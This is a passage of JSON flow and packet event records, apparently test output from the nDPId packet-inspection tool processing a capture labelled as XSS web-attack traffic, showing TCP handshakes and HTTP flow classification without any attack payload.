-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2743,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":193,"flow_packet_id":1,"flow_last_seen":1499347296462,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347296462,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8TjBAAD4Gd6CsEAABwKgKMtmGAFCTXWbOAAAAAKACchBgyQAAAgQFtAQCCAoBOij+AAAAAAEDAwc="} -00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2744,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":193,"flow_packet_id":2,"flow_last_seen":1499347296462,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347296462,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ2YaJqN5wk11mz6AScSD7NQAAAgQFtAQCCAoD4\/p1AToo\/gEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2745,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":193,"flow_packet_id":3,"flow_last_seen":1499347296463,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347296463,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0TjFAAD4Gd6esEAABwKgKMtmGAFCTXWbPiajecYAQAOWaPAAAAQEICgE6KP8D4\/p1"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2752,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":194,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347297732,"flow_last_seen":1499347297732,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347297732,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55700,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2752,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":194,"flow_packet_id":1,"flow_last_seen":1499347297732,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347297732,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8LW1AAD4GmGOsEAABwKgKMtmUAFB7SgdRAAAAAKACchDXDQAAAgQFtAQCCAoBOio8AAAAAAEDAwc="} -00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2753,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":194,"flow_packet_id":2,"flow_last_seen":1499347297733,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347297733,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ2ZST\/kF5e0oHUqAScSAC3wAAAgQFtAQCCAoD4\/uyAToqPAEDAwc="} -00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2754,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":194,"flow_packet_id":3,"flow_last_seen":1499347297733,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347297733,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0LW5AAD4GmGqsEAABwKgKMtmUAFB7SgdSk\/5BeoAQAOWh5gAAAQEICgE6KjwD4\/uy"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2770,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":195,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347300263,"flow_last_seen":1499347300263,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347300263,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55726,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2770,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":195,"flow_packet_id":1,"flow_last_seen":1499347300263,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347300263,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8bohAAD4GV0isEAABwKgKMtmuAFBvk0I9AAAAAKACchClRQAAAgQFtAQCCAoBOiy1AAAAAAEDAwc="} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2771,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":195,"flow_packet_id":2,"flow_last_seen":1499347300263,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347300263,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ2a7Gy0E5b5NCPqAScSCcEAAAAgQFtAQCCAoD4\/4rATostQEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2772,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":195,"flow_packet_id":3,"flow_last_seen":1499347300264,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347300264,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0bolAAD4GV0+sEAABwKgKMtmuAFBvk0I+xstBOoAQAOU7GAAAAQEICgE6LLUD4\/4r"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2782,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":196,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347301520,"flow_last_seen":1499347301520,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347301520,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55740,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2782,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":196,"flow_packet_id":1,"flow_last_seen":1499347301520,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347301520,"pkt":"ABm5CmnxAMGxFOsxCABFAAA80Q9AAD4G9MCsEAABwKgKMtm8AFCdpvzgAAAAAKACchC7RgAAAgQFtAQCCAoBOi3vAAAAAAEDAwc="} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2783,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":196,"flow_packet_id":2,"flow_last_seen":1499347301520,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347301520,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ2bw9W3Mnnab84aAScSAIWgAAAgQFtAQCCAoD4\/9lATot7wEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2784,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":196,"flow_packet_id":3,"flow_last_seen":1499347301521,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347301521,"pkt":"ABm5CmnxAMGxFOsxCABFAAA00RBAAD4G9MesEAABwKgKMtm8AFCdpvzhPVtzKIAQAOWnYQAAAQEICgE6Le8D4\/9l"} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2800,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":121,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347174667,"flow_last_seen":1499347180662,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347303701,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54390,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2800,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":121,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347174667,"flow_last_seen":1499347180662,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347303701,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54390,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2800,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":122,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347177248,"flow_last_seen":1499347182663,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347303701,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54416,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2800,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":122,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347177248,"flow_last_seen":1499347182663,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347303701,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54416,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2800,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":123,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347178540,"flow_last_seen":1499347183663,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347303701,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54430,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2800,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":123,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347178540,"flow_last_seen":1499347183663,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347303701,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54430,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2800,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":124,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347181178,"flow_last_seen":1499347186665,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347303701,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54456,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2800,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":124,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347181178,"flow_last_seen":1499347186665,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347303701,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54456,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2800,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":125,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347182435,"flow_last_seen":1499347187664,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347303701,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54470,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2800,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":125,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347182435,"flow_last_seen":1499347187664,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347303701,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54470,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2800,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":126,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347183714,"flow_last_seen":1499347189665,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347303701,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54484,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2800,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":126,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347183714,"flow_last_seen":1499347189665,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347303701,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54484,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2803,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":197,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347304125,"flow_last_seen":1499347304125,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347304125,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55766,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2803,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":197,"flow_packet_id":1,"flow_last_seen":1499347304125,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347304125,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8hKxAAD4GQSSsEAABwKgKMtnWAFBzErTWAAAAAKACchArQAAAAgQFtAQCCAoBOjB6AAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2804,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":197,"flow_packet_id":2,"flow_last_seen":1499347304125,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347304125,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ2dawo5LBcxK016AScSDi5QAAAgQFtAQCCAoD5AHwATowegEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2805,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":197,"flow_packet_id":3,"flow_last_seen":1499347304126,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347304126,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0hK1AAD4GQSusEAABwKgKMtnWAFBzErTXsKOSwoAQAOWB7AAAAQEICgE6MHsD5AHw"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2812,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":198,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347305402,"flow_last_seen":1499347305402,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347305402,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55780,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2812,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":198,"flow_packet_id":1,"flow_last_seen":1499347305402,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347305402,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8Z+xAAD4GXeSsEAABwKgKMtnkAFD8k1ZWAAAAAKACchD+8AAAAgQFtAQCCAoBOjG6AAAAAAEDAwc="} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2813,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":198,"flow_packet_id":2,"flow_last_seen":1499347305402,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347305402,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ2eSBOT6p\/JNWV6AScSA42QAAAgQFtAQCCAoD5AMwAToxugEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2814,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":198,"flow_packet_id":3,"flow_last_seen":1499347305403,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347305403,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0Z+1AAD4GXeusEAABwKgKMtnkAFD8k1ZXgTk+qoAQAOXX4AAAAQEICgE6MboD5AMw"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2824,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":199,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347306680,"flow_last_seen":1499347306680,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347306680,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55794,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2824,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":199,"flow_packet_id":1,"flow_last_seen":1499347306680,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347306680,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8t61AAD4GDiOsEAABwKgKMtnyAFBPt4VUAAAAAKACchB7ggAAAgQFtAQCCAoBOjL5AAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2825,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":199,"flow_packet_id":2,"flow_last_seen":1499347306680,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347306680,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ2fJOMjqdT7eFVaAScSDrPgAAAgQFtAQCCAoD5ARvAToy+QEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2826,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":199,"flow_packet_id":3,"flow_last_seen":1499347306680,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347306680,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0t65AAD4GDiqsEAABwKgKMtnyAFBPt4VVTjI6noAQAOWKRgAAAQEICgE6MvkD5ARv"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2842,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":200,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347309314,"flow_last_seen":1499347309314,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347309314,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55820,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2842,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":200,"flow_packet_id":1,"flow_last_seen":1499347309314,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347309314,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8V4pAAD4GbkasEAABwKgKMtoMAFADiWIGAAAAAKACchDoUQAAAgQFtAQCCAoBOjWMAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2843,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":200,"flow_packet_id":2,"flow_last_seen":1499347309314,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347309314,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ2gztcSluA4liB6AScSDHagAAAgQFtAQCCAoD5AcCATo1jAEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2844,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":200,"flow_packet_id":3,"flow_last_seen":1499347309314,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347309314,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0V4tAAD4Gbk2sEAABwKgKMtoMAFADiWIH7XEpb4AQAOVmcgAAAQEICgE6NYwD5AcC"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2854,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":201,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347310567,"flow_last_seen":1499347310567,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347310567,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55834,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2854,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":201,"flow_packet_id":1,"flow_last_seen":1499347310567,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347310567,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8riNAAD4GF62sEAABwKgKMtoaAFDhF5jmAAAAAKACchDSmwAAAgQFtAQCCAoBOjbFAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2855,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":201,"flow_packet_id":2,"flow_last_seen":1499347310567,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347310567,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ2hoggEnh4ReY56AScSBc+gAAAgQFtAQCCAoD5Ag7ATo2xQEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2856,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":201,"flow_packet_id":3,"flow_last_seen":1499347310567,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347310567,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0riRAAD4GF7SsEAABwKgKMtoaAFDhF5jnIIBJ4oAQAOX8AQAAAQEICgE6NsUD5Ag7"} 